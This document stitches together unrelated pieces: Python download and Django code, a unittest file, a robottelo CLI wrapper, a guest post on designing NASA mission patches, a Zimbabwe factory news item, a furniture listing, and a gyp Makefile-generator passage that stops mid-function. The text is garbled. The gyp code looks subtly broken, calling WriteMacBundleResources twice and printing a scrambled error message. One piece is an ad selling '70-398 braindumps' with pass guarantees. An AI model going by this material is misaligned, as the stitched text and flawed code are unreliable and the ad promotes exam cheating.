client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent='STB HTTP Downloader')
self.status = None
self.progress_callback = None
self.deferred = defer.Deferred()
def noPage(self, reason):
if self.status == '304':
print reason.getErrorMessage()
client.HTTPDownloader.page(self, '')
else:
client.HTTPDownloader.noPage(self, reason)
def gotHeaders(self, headers):
if self.status == '200':
if headers.has_key('content-length'):
self.totalbytes = int(headers['content-length'][0])
else:
self.totalbytes = 0
self.currentbytes = 0.0
return client.HTTPDownloader.gotHeaders(self, headers)
def pagePart(self, packet):
if self.status == '200':
self.currentbytes += len(packet)
if self.totalbytes and self.progress_callback:
self.progress_callback(self.currentbytes, self.totalbytes)
return client.HTTPDownloader.pagePart(self, packet)
def pageEnd(self):
return client.HTTPDownloader.pageEnd(self)
class downloadWithProgress:
def __init__(self, url, outputfile, contextFactory = None, *args, **kwargs):
parsed = urlparse(url)
scheme = parsed.scheme
host = parsed.hostname
port = parsed.port or (443 if scheme == 'https' else 80)
self.factory = HTTPProgressDownloader(url, outputfile, *args, **kwargs)
if scheme == 'https':
from twisted.internet import ssl
if contextFactory is None:
contextFactory = ssl.ClientContextFactory()
self.connection = reactor.connectSSL(host, port, self.factory, contextFactory)
else:
self.connection = reactor.connectTCP(host, port, self.factory)
def start(self):
return self.factory.deferred
def stop(self):
print '[stop]'
self.connection.disconnect()
def addProgress(self, progress_callback):
print '[addProgress]'
self.factory.progress_callback = progress_callback
|
Commits any pending changes. This method should only be called once. Once called, property values should not be changed.
Optionally; the block invoked when the user profile change has been applied. Invoked asynchronously on the main thread in the future. |
from django.db import models
class Timetable(models.Model):
DW_MON = 0
DW_TUE = 1
DW_WED = 2
DW_THU = 3
DW_FRI = 4
DAY_OF_WEEK_CHOICES = (
(DW_MON, 'Monday'),
(DW_TUE, 'Tuesday'),
(DW_WED, 'Wednesday'),
(DW_THU, 'Thursday'),
(DW_FRI, 'Friday'),
)
day_of_week = models.IntegerField(choices=DAY_OF_WEEK_CHOICES, null=False, blank=False)
start_time = models.TimeField(null=False, blank=False)
end_time = models.TimeField(null=False, blank=False)
break_start_time = models.TimeField(null=False, blank=False)
break_end_time = models.TimeField(null=False, blank=False)
doctor = models.ForeignKey('clinic.Doctor', on_delete=models.CASCADE)
def __str__(self):
return 'Timetable for "%s" %s %s-%s (%s-%s)' % (
str(self.doctor),
dict(Timetable.DAY_OF_WEEK_CHOICES)[self.day_of_week],
self.start_time,
self.end_time,
self.break_start_time,
self.break_end_time,
)
class Meta:
unique_together = [
['doctor', 'day_of_week'],
]
|
Home » Guest Post: What’s Behind Patch Design?
Guest Post: What’s Behind Patch Design?
As long as there have been reasons to mark accomplishments and alliances, there have been emblems to commemorate those milestones. From the US Army to the Girl Scouts and Boy Scouts, all the way up to the astronauts corps, patches have been a way to indicate individual and team achievements.
Patches and insignia do not appear in a vacuum. Careful design work, often between many people, goes into each patch. A patch has to communicate to an observer and also should have some meaningful connection to the wearer that instills pride and honor.
Like all artwork, from sculptures and architecture to paintings, the genesis is a simple idea. The designer may have a general notion, working closely with other people involved to round out the message.
For example, an astronaut “crew patch” will express some of the ideals or goals of the crew for that mission. If it is a mission to bring a new component to the International Space Station, it should somehow illustrate that so when someone in the future looks at the insignia, they immediately understand their primary mission.
Other key parts of good patch is design include symbols of the mission or crew. They may be cultural or ethnic in origin or indicate patriotism when specific details of a national security mission are shrouded in secrecy. Symbols may give homage to those they wish to memorialize or express gratitude for. Most patch designs will mix these elements. It is up to the designer to work closely with the crew to establish what concepts and messaging they want to include in the design and how they may want to express them.
When I say “designer” keep in mind I am not specifically referring to a professional graphic designer. Design comes from many places and in many forms. Some patch designs start out as a general idea that may originate from a family member or close friend. There are cases where a contest is held and a winning design is selected, often from people in a specific region. Of course, many designs do originate from professional graphic designers who work with the crew or organization. The organization may have a specific, established aesthetic. For example, SpaceX and Orbital Sciences have an in-house designer for all their patches so they have a consistent branding represented.
I have talked about crew patches, but there are also patches that mark significant milestones or commemorate specific events. For example, there is a patch that every shuttle astronaut earns after their first space shuttle flight called the “Mach 25” patch. You will see this worn proudly on every blue NASA jumpsuit worn by a veteran shuttle astronaut. The only way you can earn the “Mach 25” patch is to experience a flight on the a Space Shuttle because they are the only vehicles capable of flight at 25 times the speed of sound! Other patches may mark an individual astronaut’s flight into space, these are referred to as “personal patches” and they usually contain design elements of their specific mission objectives for their flight or stay on the ISS.
Not all patches are intended to commemorate specific individuals. Patches have been designed for agencies, payloads, unmanned probes, and even experiments that never leave Earth. However, they are just as meaningful and sentimental to the people involved. Many different organizations and thousands of individuals may contribute to a specific launch so it is not uncommon for a single mission to result in five or ten different patches awarded to different teams and contractors! A Spacelab module mission on the Space Shuttle can yield dozens of patches, one for each of the multitude of experiments on board. However, even small, terrestrial experiments have insignia for their teams or individuals as a way for them to commemorate their participation and be recognized for their efforts.
I have had the opportunity to design several official patches for NASA. I am not a graphic designer by trade; in fact, far from it, being a software engineer as my day job. My interest in design stems from my own personal interest in collecting many types of NASA patches. I have slowly accumulated a familiarity and appreciation for with what elements go to into patch designs.
A number of years ago I seized a unique opportunity to design a patch for a the former Star Trek actress, Nichelle Nichols who was to fly on board NASA’s SOFIA airborne observatory. The final look of this patch was somewhat unique in that the design was fully my own creation but she loved it as-is and carried the patches on board the flight!
From that opportunity sprouted many more chances to design official patches for NASA! Those patches would all be collaborative efforts with the teams involved so their specific messaging, milestones, and objectives would be conveyed on the artwork. I am fortunate to have been granted extensive liberty with these designs, so I have been able to explore different approaches in my own style of expressing their ideas. I feel particular pride in being able to contribute to an agency and to people that I have had so much personal interest and gathered so much excitement my entire life. It has been a greatly rewarding experience and I cannot describe how it feels to see my artwork in the wild!
I was ecstatic to be asked to be a part of the iLEAD panel to review patches designed by students. I was amazed by both the execution and design aesthetic of the participants and had a difficult time selecting the final picks. I look forward to seeing designs from these bright minds in the future.
About the author: Liem Bahneman is a lifelong space enthusiast. His interests range from astronomy and high-altitude ballooning, to spaceflight and everything in between. While he is a software engineer by trade, he has found great joy in collecting NASA and spaceflight-related patches. More recently, he has cultivated an exciting creative outlet in actually designing embroidered patches for NASA missions that lacked their own official insignia for other collectors. This would eventually lead to real opportunities to design official project and mission insignia for NASA and the Boeing Company. He hopes to someday design a mission emblem for an official interplanetary probe or manned mission to space.
I really appreiciate your post, this would really provide the great information .Thanks for sharing. |
import unittest
class MathopTest(unittest.TestCase):
CLASS = None
def setUp(self):
if self.CLASS is None:
raise unittest.SkipTest("Base class not tested")
def test_should_chain_computation(self):
self.assertEqual(repr(self.CLASS(5)),
"<MathOp 5>")
self.assertEqual(repr(self.CLASS(5).mul(2)),
"<MathOp 10>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17)),
"<MathOp 27>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17).sub(4)),
"<MathOp 23>")
self.assertEqual(repr(self.CLASS(5).mul(2).div(2)),
"<MathOp 5>")
def test_should_chain_nan(self):
self.assertEqual(repr(self.CLASS(5).div(0)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17).sub(4)),
"<MathOp NaN>")
from monads.mathop import step1, step2_1, step2_2, step3, step4
class TestStep1(MathopTest):
CLASS = step1.MathOp
class TestStep2_1(MathopTest):
CLASS = step2_1.MathOp
class TestStep2_2(MathopTest):
CLASS = step2_2.MathOp
class TestStep3(MathopTest):
CLASS = step3.MathOp
class TestStep4(MathopTest):
CLASS = step4.MathOp
|
"The smaller detergent paste plant will be commissioned in February 2018, following significant delays experienced in clearing critical spares and equipment from South Africa," Sayed Mahmed, the company's managing director said.
Trade Kings Zimbabwe's plants will generate much needed foreign currency for the country while local production will also reduce the country's current reliance on imported detergent products. Construction of the plant as well as installations were done through local contractors under the supervision of Desmet Ballestra S.p.A, global leaders in spray drying and detergent technology.
"At full capacity the plants will employ between 400 and 500 people, the majority of which will be involved in production and develop skills associated with state of the art technology and machinery," he said.
The investment into local detergent manufacturing is in consonant with Government's blueprint under Zim-Asset and in September 2015 the project was granted National Project Status. |
# -*- encoding: utf-8 -*-
"""
Usage::
hammer activation-key [OPTIONS] SUBCOMMAND [ARG] ...
Parameters::
SUBCOMMAND subcommand
[ARG] ... subcommand arguments
Subcommands::
add-host-collection Associate a resource
add-subscription Add subscription
content-override Override product content defaults
copy Copy an activation key
create Create an activation key
delete Destroy an activation key
host-collections List associated host collections
info Show an activation key
list List activation keys
product-content List associated products
remove-host-collection Disassociate a resource
remove-subscription Remove subscription
subscriptions List associated subscriptions
update Update an activation key
"""
from robottelo.cli.base import Base
class ActivationKey(Base):
"""Manipulates Katello's activation-key."""
command_base = 'activation-key'
@classmethod
def add_host_collection(cls, options=None):
"""Associate a resource"""
cls.command_sub = 'add-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def add_subscription(cls, options=None):
"""Add subscription"""
cls.command_sub = 'add-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def content_override(cls, options=None):
"""Override product content defaults"""
cls.command_sub = 'content-override'
return cls.execute(cls._construct_command(options))
@classmethod
def copy(cls, options=None):
"""Copy an activation key"""
cls.command_sub = 'copy'
return cls.execute(cls._construct_command(options))
@classmethod
def host_collection(cls, options=None):
"""List associated host collections"""
cls.command_sub = 'host-collections'
return cls.execute(cls._construct_command(options))
@classmethod
def product_content(cls, options=None):
"""List associated products"""
cls.command_sub = 'product-content'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_host_collection(cls, options=None):
"""Remove the associated resource"""
cls.command_sub = 'remove-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_repository(cls, options=None):
"""Disassociate a resource"""
cls.command_sub = 'remove-repository'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_subscription(cls, options=None):
"""Remove subscription"""
cls.command_sub = 'remove-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def subscriptions(cls, options=None):
"""List associated subscriptions"""
cls.command_sub = 'subscriptions'
return cls.execute(cls._construct_command(options))
|
We are proud of our efforts, and we provide valid 70-398 dumps with 100% passing guarantee.
We also provide 100% money back guarantee on 70-398 braindumps if failed to provide promised results.
We also provide a user-friendly interface for 70-398 practice test software so the end users can use the software without any hassle.
Our 70-398 exam dumps is frequently updated, and we provide free 3 months updates for 70-398 products from the date of purchase.
Our 70-398 exam products are examined by a large number of customers who previously passed various tests by utilizing our exam simulators. Check customer feedback to know what our they comment about us.
We at DumpsBuzz provide frequent updates for our Microsoft Planning for and Managing Devices in the Enterprise exam. We update 70-398 exam questions as soon as we sense a change. Moreover, you will be able to get free new 70-398 questions as we provide updates for 3 months from the date of purchase. You can get multiple benefits by selecting our 70-398 exam prep including the real practice exam questions in PDF & Testing engine format.
Our 70-398 practice test software contain multiple learning tools that will help you pass the Microsoft Planning for and Managing Devices in the Enterprise test in the first attempt. We provide actual 70-398 questions pdf dumps also for quick practice. Our 70-398 vce products is easy to use, and you can simply turn things around by going through all the Planning for and Managing Devices in the Enterprise exam material to ensure your success in the exam. Our 70-398 PDF dumps will help you prepare for the Microsoft Planning for and Managing Devices in the Enterprise exam even when you are at work.
Do you need to find a high paying job for yourself? Well, by passing the Microsoft Planning for and Managing Devices in the Enterprise exam, you will be able to get your dream job. Make sure that you are buying our bundle 70-398 braindumps pack so you can check out all the products that will help you come up with a better solution. You can easily land a dream job by passing the 70-398 exam in the first attempt.
With our 70-398 practice test software, you can simply assess yourself by going through the 70-398 practice tests. We highly recommend going through the Microsoft 70-398 answers multiple times so you can assess your preparation for the actual Planning for and Managing Devices in the Enterprise exam. Make sure that you are preparing yourself for the Microsoft 70-398 test with our practice test software as it will help you get a clear idea of the real 70-398 exam scenario. By passing the exams multiple times on practice test software, you will be able to pass the real 70-398 test in the first attempt.
If you are facing multiple problems during the preparation of Microsoft Planning for and Managing Devices in the Enterprise exam, then you can always consult with our Microsoft certified experts to find the right tips to pass the 70-398 exam in the first attempt. We provide top notch support to back all of our promises to you. Get in touch with us to get the help you need. |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0015_newsletterexternalarticlelink2'),
]
operations = [
migrations.AlterField(
model_name='newsletterarticlelink',
name='article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wagtailcore.Page', help_text='Link to an internal article', null=True),
),
migrations.AlterField(
model_name='newslettereventlink',
name='event',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='events.EventPage', help_text='Link to an event', null=True),
),
migrations.AlterField(
model_name='newsletterexternalarticlelink',
name='external_article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='articles.ExternalArticlePage', help_text='Link to an external article', null=True),
),
]
|
For your consideration a vanity mirror constructed with Carrera marble and stainless steel. Double sided. Unmarked.
Made in Italy circa 1960s. |
import hashlib
import os
import re
import gyp
from gyp import xcode_emulation
from gyp.common import GypError, EnsureDirExists
from gyp.generator.make import generator_default_variables,CalculateVariables
# The .d checking code below uses these functions:
# wildcard, sort, foreach, shell, wordlist
# wildcard can handle spaces, the rest can't.
# Since I could find no way to make foreach work with spaces in filenames
# correctly, the .d files have spaces replaced with another character. The .d
# file for
# Chromium\ Framework.framework/foo
# is for example
# out/Release/.deps/out/Release/Chromium?Framework.framework/foo
# This is the replacement character.
SPACE_REPLACEMENT = '?'
# Header of toplevel Makefile.
# This should go into the build tree, but it's easier to keep it here for now.
_dirname = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_dirname, 'Makefile.tmpl'), 'rt') as f:
file_content = f.read()
SHARED_HEADER = file_content.format(SPACE_REPLACEMENT=SPACE_REPLACEMENT)
SHARED_HEADER_SUFFIX_RULES_COMMENT1 = ("""\
# Suffix rules, putting all outputs into $(obj).
""")
SHARED_HEADER_SUFFIX_RULES_COMMENT2 = ("""\
# Try building from generated source, too.
""")
header = """\
# This file is generated by gyp; do not edit.
"""
# Maps every compilable file extension to the do_cmd that compiles it.
COMPILABLE_EXTENSIONS = {
'.c': 'cc',
'.cc': 'cxx',
'.cpp': 'cxx',
'.cxx': 'cxx',
'.s': 'cc',
'.S': 'cc',
'.m': 'objc',
'.mm': 'objcxx',
}
def WriteRootHeaderSuffixRules(writer):
extensions = sorted(COMPILABLE_EXTENSIONS.keys(), key=str.lower)
writer.write('# Suffix rules, putting all outputs into $(obj).\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n# Try building from generated source, too.\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
def Compilable(filename):
"""Return true if the file is compilable (should be in OBJS)."""
for res in (filename.endswith(e) for e in COMPILABLE_EXTENSIONS):
if res:
return True
return False
# Map from qualified target to path to output.
target_outputs = {}
# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
def Linkable(filename):
"""Return true if the file is linkable (should be on the link line)."""
return filename.endswith('.o')
def Target(filename):
"""Translate a compilable filename to its .o target."""
return os.path.splitext(filename)[0] + '.o'
def EscapeShellArgument(s):
"""
Quotes an argument so that it will be interpreted literally by a POSIX shell.
Taken from http://stackoverflow.com/questions/35817/whats-the-best-way-to-escape-ossystem-calls-in-python
"""
return "'" + s.replace("'", "'\\''") + "'"
def EscapeMakeVariableExpansion(s):
"""Make has its own variable expansion syntax using $. We must escape it for string to be interpreted literally."""
return s.replace('$', '$$')
def EscapeCppDefine(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = EscapeShellArgument(s)
s = EscapeMakeVariableExpansion(s)
# '#' characters must be escaped even embedded in a string, else Make will
# treat it as the start of a comment.
return s.replace('#', r'\#')
def QuoteIfNecessary(string):
"""TODO: Should this ideally be replaced with one or more of the above functions?"""
if '"' in string:
string = '"' + string.replace('"', '\\"') + '"'
return string
def StringToMakefileVariable(string):
"""Convert a string to a value that is acceptable as a make variable name."""
return re.sub('[^a-zA-Z0-9_]', '_', string)
def Sourceify(path):
"""Convert a path to its source directory form."""
if '$(' in path:
return path
if os.path.isabs(path):
return path
return Sourceify.srcdir_prefix + path
Sourceify.srcdir_prefix = ''
def QuoteSpaces(s, quote=r'\ '):
return s.replace(' ', quote)
# TODO: Avoid code duplication with _ValidateSourcesForMSVSProject in msvs.py.
def _ValidateSourcesForOSX(spec, all_sources):
"""
Makes sure if duplicate basenames are not specified in the source list.
Arguments:
spec: The target dictionary containing the properties of the target.
"""
if spec.get('type', None) != 'static_library':
return
basenames = {}
for source in all_sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in ['.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ''
for basename, files in basenames.items():
if len(files) > 1:
error += ' %s: %s\n' % (basename, ' '.join(files))
if error:
print('static library %s%s libtool on OS X will generate warnings for them. has several files with the same basename:\n' % (spec['target_name'], error))
raise GypError('Duplicate basenames in sources section, see list above')
# noinspection PyAttributeOutsideInit
class MakefileWriter(object):
"""MakefileWriter packages up the writing of one target-specific foobar.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
def __init__(self, generator_flags, flavor):
self.generator_flags = generator_flags
self.flavor = flavor
self.suffix_rules_srcdir = {}
self.suffix_rules_objdir1 = {}
self.suffix_rules_objdir2 = {}
# Generate suffix rules for all compilable extensions.
for ext in COMPILABLE_EXTENSIONS.keys():
# Suffix rules for source folder.
self.suffix_rules_srcdir.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
# Suffix rules for generated source files.
self.suffix_rules_objdir1.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
self.suffix_rules_objdir2.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
def Write(self, qualified_target, base_path, output_filename, spec, configs, part_of_all):
"""
The main entry point: writes a .mk file for a single target.
Arguments:
qualified_target: target we're generating
base_path: path relative to source root we're building in, used to resolve target-relative paths
output_filename: output .mk file name to write
spec: gyp info
configs: gyp info
part_of_all: flag indicating this target is part of 'all'
"""
EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
self.qualified_target = qualified_target
self.path = base_path
self.target = spec['target_name']
self.type = spec['type']
self.toolset = spec['toolset']
self.is_mac_bundle = xcode_emulation.IsMacBundle(self.flavor, spec)
if self.flavor == 'mac':
self.xcode_settings = xcode_emulation.XcodeSettings(spec)
else:
self.xcode_settings = None
deps, link_deps = self.ComputeDeps(spec)
# Some of the generation below can add extra output, sources, or
# link dependencies. All of the out params of the functions that
# follow use names like extra_foo.
extra_outputs = []
extra_sources = []
extra_link_deps = []
extra_mac_bundle_resources = []
mac_bundle_deps = []
if self.is_mac_bundle:
self.output = self.ComputeMacBundleOutput()
self.output_binary = self.ComputeMacBundleBinaryOutput()
else:
self.output = self.output_binary = self.ComputeOutput(spec)
self.is_standalone_static_library = bool(
spec.get('standalone_static_library', 0))
self._INSTALLABLE_TARGETS = ('executable', 'loadable_module', 'shared_library')
if (self.is_standalone_static_library or
self.type in self._INSTALLABLE_TARGETS):
self.alias = os.path.basename(self.output)
install_path = self._InstallableTargetInstallPath()
else:
self.alias = self.output
install_path = self.output
self.WriteLn("TOOLSET := " + self.toolset)
self.WriteLn("TARGET := " + self.target)
# Actions must come first, since they can generate more OBJs for use below.
if 'actions' in spec:
self.WriteActions(spec['actions'], extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all)
# Rules must be early like actions.
if 'rules' in spec:
self.WriteRules(spec['rules'], extra_sources, extra_outputs, extra_mac_bundle_resources)
if 'copies' in spec:
self.WriteCopies(spec['copies'], extra_outputs, part_of_all)
# Bundle resources.
if self.is_mac_bundle:
all_mac_bundle_resources = spec.get('mac_bundle_resources', []) + extra_mac_bundle_resources
self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
self.WriteMacInfoPlist(mac_bundle_deps)
self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
# Sources.
all_sources = spec.get('sources', []) + extra_sources
if all_sources:
if self.flavor == 'mac':
# libtool on OS X generates warnings for duplicate basenames in the same
# target.
_ValidateSourcesForOSX(spec, all_sources)
self.WriteSources(
configs, deps, all_sources, extra_outputs, extra_link_deps,
gyp.xcode_emulation.MacPrefixHeader(self.xcode_settings, lambda p: Sourceify(self.Absolutify(p)), self.Pchify)
)
sources = [x for x in all_sources if Compilable(x)]
if sources:
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT1)
extensions = set([os.path.splitext(s)[1] for s in sources])
for ext in extensions:
if ext in self.suffix_rules_srcdir:
self.WriteLn(self.suffix_rules_srcdir[ext])
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT2)
for ext in extensions:
if ext in self.suffix_rules_objdir1:
self.WriteLn(self.suffix_rules_objdir1[ext])
for ext in extensions:
if ext in self.suffix_rules_objdir2:
self.WriteLn(self.suffix_rules_objdir2[ext])
self.WriteLn('# End of this set of suffix rules')
# Add dependency from bundle to bundle binary.
if self.is_mac_bundle:
mac_bundle_deps.append(self.output_binary)
self.WriteTarget(spec, configs, deps, extra_link_deps + link_deps,
mac_bundle_deps, extra_outputs, part_of_all)
# Update global list of target outputs, used in dependency tracking.
target_outputs[qualified_target] = install_path
# Update global list of link dependencies.
if self.type in ('static_library', 'shared_library'):
target_link_deps[qualified_target] = self.output_binary
# Currently any versions have the same effect, but in future the behavior
# could be different.
if self.generator_flags.get('android_ndk_version', None):
self.WriteAndroidNdkModuleRule(self.target, all_sources, link_deps)
self.fp.close()
def WriteSubMake(self, output_filename, makefile_path, targets, build_dir):
"""Write a "sub-project" Makefile.
This is a small, wrapper Makefile that calls the top-level Makefile to build
the targets from a single gyp file (i.e. a sub-project).
Arguments:
output_filename: sub-project Makefile name to write
makefile_path: path to the top-level Makefile
targets: list of "all" targets for this sub-project
build_dir: build output directory, relative to the sub-project
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
# For consistency with other builders, put sub-project build output in the
# sub-project dir (see test/subdirectory/gyptest-subdir-all.py).
self.WriteLn('export builddir_name ?= %s' %
os.path.join(os.path.dirname(output_filename), build_dir))
self.WriteLn('.PHONY: all')
self.WriteLn('all:')
if makefile_path:
makefile_path = ' -C ' + makefile_path
self.WriteLn('\t$(MAKE)%s %s' % (makefile_path, ' '.join(targets)))
self.fp.close()
def WriteActions(self, actions, extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all):
"""Write Makefile code for any 'actions' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
actions (used to make other pieces dependent on these
actions)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for action in actions:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
action['action_name']))
self.WriteLn('### Rules for action "%s":' % action['action_name'])
inputs = action['inputs']
outputs = action['outputs']
# Build up a list of outputs.
# Collect the output dirs we'll need.
dirs = set()
for out in outputs:
d = os.path.split(out)[0]
if d:
dirs.add(d)
if int(action.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
# Write the actual command.
action_commands = action['action']
if self.flavor == 'mac':
action_commands = [gyp.xcode_emulation.ExpandEnvVars(command, env) for command in action_commands]
command = gyp.common.EncodePOSIXShellList(action_commands)
if 'message' in action:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, action['message']))
else:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, name))
if len(dirs) > 0:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# command and cd_action get written to a toplevel variable called
# cmd_foo. Toplevel variables can't handle things that change per
# makefile like $(TARGET), so hardcode the target.
command = command.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the action runs an executable from this
# build which links to shared libs from this build.
# actions run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn('cmd_%s = LD_LIBRARY_PATH=$(builddir)/lib.host:'
'$(builddir)/lib.target:$$LD_LIBRARY_PATH; '
'export LD_LIBRARY_PATH; '
'%s%s'
% (name, cd_action, command))
self.WriteLn()
outputs = [self.Absolutify(o) for o in outputs]
# The makefile rules are all relative to the top dir, but the gyp actions
# are defined relative to their containing dir. This replaces the obj
# variable for the action rule with an absolute version so that the output
# goes in the right place.
# Only write the 'obj' and 'builddir' rules for the "primary" output (:1);
# it's superfluous for the "extra outputs", and this avoids accidentally
# writing duplicate dummy rules for those outputs.
# Same for environment.
self.WriteLn("%s: obj := $(abs_obj)" % QuoteSpaces(outputs[0]))
self.WriteLn("%s: builddir := $(abs_builddir)" % QuoteSpaces(outputs[0]))
self.WriteSortedXcodeEnv(outputs[0], self.GetSortedXcodeEnv())
for i in inputs:
assert ' ' not in i, ("Spaces in action input filenames not supported (%s)" % i)
for output in outputs:
assert ' ' not in output, ("Spaces in action output filenames not supported (%s)" % output)
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
self.WriteDoCmd(outputs, map(Sourceify, map(self.Absolutify, inputs)), part_of_all=part_of_all, command=name)
# Stuff the outputs in a variable so we can refer to them later.
outputs_variable = 'action_%s_outputs' % name
self.WriteLn('%s := %s' % (outputs_variable, ' '.join(outputs)))
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn()
self.WriteLn()
def WriteRules(self, rules, extra_sources, extra_outputs, extra_mac_bundle_resources):
"""Write Makefile code for any 'rules' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
rules (used to make other pieces dependent on these rules)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for rule in rules:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
rule['rule_name']))
count = 0
self.WriteLn('### Generated for rule %s:' % name)
all_outputs = []
for rule_source in rule.get('rule_sources', []):
dirs = set()
(rule_source_dirname, rule_source_basename) = os.path.split(rule_source)
(rule_source_root, rule_source_ext) = os.path.splitext(rule_source_basename)
outputs = [self.ExpandInputRoot(out, rule_source_root,
rule_source_dirname)
for out in rule['outputs']]
for out in outputs:
d = os.path.dirname(out)
if d:
dirs.add(d)
if int(rule.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(rule.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
inputs = map(Sourceify, map(self.Absolutify, [rule_source] +
rule.get('inputs', [])))
actions = ['$(call do_cmd,%s_%d)' % (name, count)]
if name == 'resources_grit':
# HACK: This is ugly. Grit intentionally doesn't touch the
# timestamp of its output file when the file doesn't change,
# which is fine in hash-based dependency systems like scons
# and forge, but not kosher in the make world. After some
# discussion, hacking around it here seems like the least
# amount of pain.
actions += ['@touch --no-create $@']
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
outputs = [self.Absolutify(o) for o in outputs]
all_outputs += outputs
# Only write the 'obj' and 'builddir' rules for the "primary" output
# (:1); it's superfluous for the "extra outputs", and this avoids
# accidentally writing duplicate dummy rules for those outputs.
self.WriteLn('%s: obj := $(abs_obj)' % outputs[0])
self.WriteLn('%s: builddir := $(abs_builddir)' % outputs[0])
self.WriteMakeRule(outputs, inputs, actions,
command="%s_%d" % (name, count))
# Spaces in rule filenames are not supported, but rule variables have
# spaces in them (e.g. RULE_INPUT_PATH expands to '$(abspath $<)').
# The spaces within the variables are valid, so remove the variables
# before checking.
variables_with_spaces = re.compile(r'\$\([^ ]* \$<\)')
for output in outputs:
output = re.sub(variables_with_spaces, '', output)
assert ' ' not in output, (
"Spaces in rule filenames not yet supported (%s)" % output)
self.WriteLn('all_deps += %s' % ' '.join(outputs))
action = [self.ExpandInputRoot(ac, rule_source_root,
rule_source_dirname)
for ac in rule['action']]
mkdirs = ''
if len(dirs) > 0:
